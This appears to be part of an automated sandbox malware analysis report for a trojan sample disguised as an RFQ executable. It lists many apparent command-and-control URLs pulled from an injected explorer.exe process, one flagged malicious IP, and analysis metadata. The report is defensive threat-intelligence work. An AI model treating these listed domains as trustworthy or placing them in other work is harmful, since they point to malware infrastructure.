                                                                                        http://www.ilw.legal/c24t/explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://www.orenzoplaybest14.xyz/c24t/explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://www.aithful.events/c24t/www.ealerslot.netexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000006.00000000.1739582157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                http://www.consuyt.xyz/c24t/explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://www.lc-driving-school.netReferer:explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      http://www.02s-pest-control-us-ze.fun/c24t/www.sx9u.shopexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://schemas.micrexplorer.exe, 00000006.00000000.1745616106.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://www.carterandcone.comlRFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://www.delark.clickexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              http://www.aithful.eventsReferer:explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  http://www.fontbureau.com/designers/frere-user.htmlRFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://www.lc-driving-school.netexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://android.notify.windows.com/iOSexplorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://www.ridges-freezers-56090.bond/c24t/explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://www.khizmetlergirisyapzzz2024.netReferer:explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000006.00000000.1739582157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              http://www.j88.travel/c24t/www.venir-bienne.infoexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://outlook.com_explorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115691066.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3483071267.000000000C5E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://www.lc-driving-school.net/c24t/explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        http://www.fontbureau.com/designersGRFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        http://schemas.miexplorer.exe, 00000006.00000000.1745616106.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          http://www.fontbureau.com/designers/?RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          http://www.founder.com.cn/cn/bTheRFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          http://www.sx9u.shopexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            http://www.ilw.legalexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              http://www.fontbureau.com/designers?RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                http://www.ealerslot.netReferer:explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://powerpoint.office.comcemberexplorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115691066.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3483071267.000000000C5E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  http://www.ilw.legalReferer:explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    http://www.earing-tests-69481.bond/c24t/explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://www.orenzoplaybest14.xyzexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        http://www.tiro.comRFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          http://www.ridges-freezers-56090.bondexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            http://www.goodfont.co.krRFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://schemas.microexplorer.exe, 00000006.00000002.4157692270.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4155839185.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1741977210.0000000008720000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://www.oko.events/c24t/www.earing-tests-69481.bondexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              http://www.consuyt.xyz/c24t/www.khizmetlergirisyapzzz2024.netexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                http://www.typography.netDRFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                		unknown
                                                                                                                                                                http://www.458881233.men/c24t/explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://www.galapagosdesign.com/staff/dennis.htmRFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://www.458881233.men/c24t/www.delark.clickexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://www.oko.eventsexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://api.msn.com/qexplorer.exe, 00000006.00000000.1743773191.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4156756426.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3116314760.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://www.oko.events/c24t/explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            http://www.orenzoplaybest14.xyzReferer:explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown

                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                Public IPs

                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                188.114.96.3
                                                                                                                                                                                		www.j88.travelEuropean Union
                                                                                                                                                                                		13335CLOUDFLARENETUStrue

                                                                                                                                                                                General Information

                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                Analysis ID:1528045
                                                                                                                                                                                Start date and time:2024-10-07 14:46:08 +02:00
                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                Overall analysis duration:0h 11m 3s
                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                Report type:full
                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                Number of analysed new started processes analysed:13
                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                Number of injected processes analysed:1
                                                                                                                                                                                Technologies:
                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                Sample name:RFQ 245801.exe
                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                Classification:mal100.troj.evad.winEXE@13/6@11/1
                                                                                                                                                                                EGA Information:
                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                HCA Information:
                                                                                                                                                                                • Successful, ratio: 99%
                                                                                                                                                                                • Number of executed functions: 121
                                                                                                                                                                                • Number of non-executed functions: 317
                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                Warnings

                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                • VT rate limit hit for: RFQ 245801.exe

                                                                                                                                                                                Simulations

                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                08:47:03API Interceptor1x Sleep call for process: RFQ 245801.exe modified
                                                                                                                                                                                08:47:04API Interceptor15x Sleep call for process: powershell.exe modified
                                                                                                                                                                                08:47:13API Interceptor7153848x Sleep call for process: explorer.exe modified
                                                                                                                                                                                08:47:50API Interceptor6449769x Sleep call for process: NETSTAT.EXE modified

                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                IPs

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                188.114.96.374qgPmarBM.exeGet hashmaliciousPonyBrowse
                                                                                                                                                                                • kuechenundmehr.com/x.htm
                                                                                                                                                                                PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • www.cc101.pro/ttiz/
                                                                                                                                                                                http://revexhibition.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                • revexhibition.pages.dev/favicon.ico
                                                                                                                                                                                http://meta.case-page-appeal.eu/community-standard/112225492204863/Get hashmaliciousUnknownBrowse
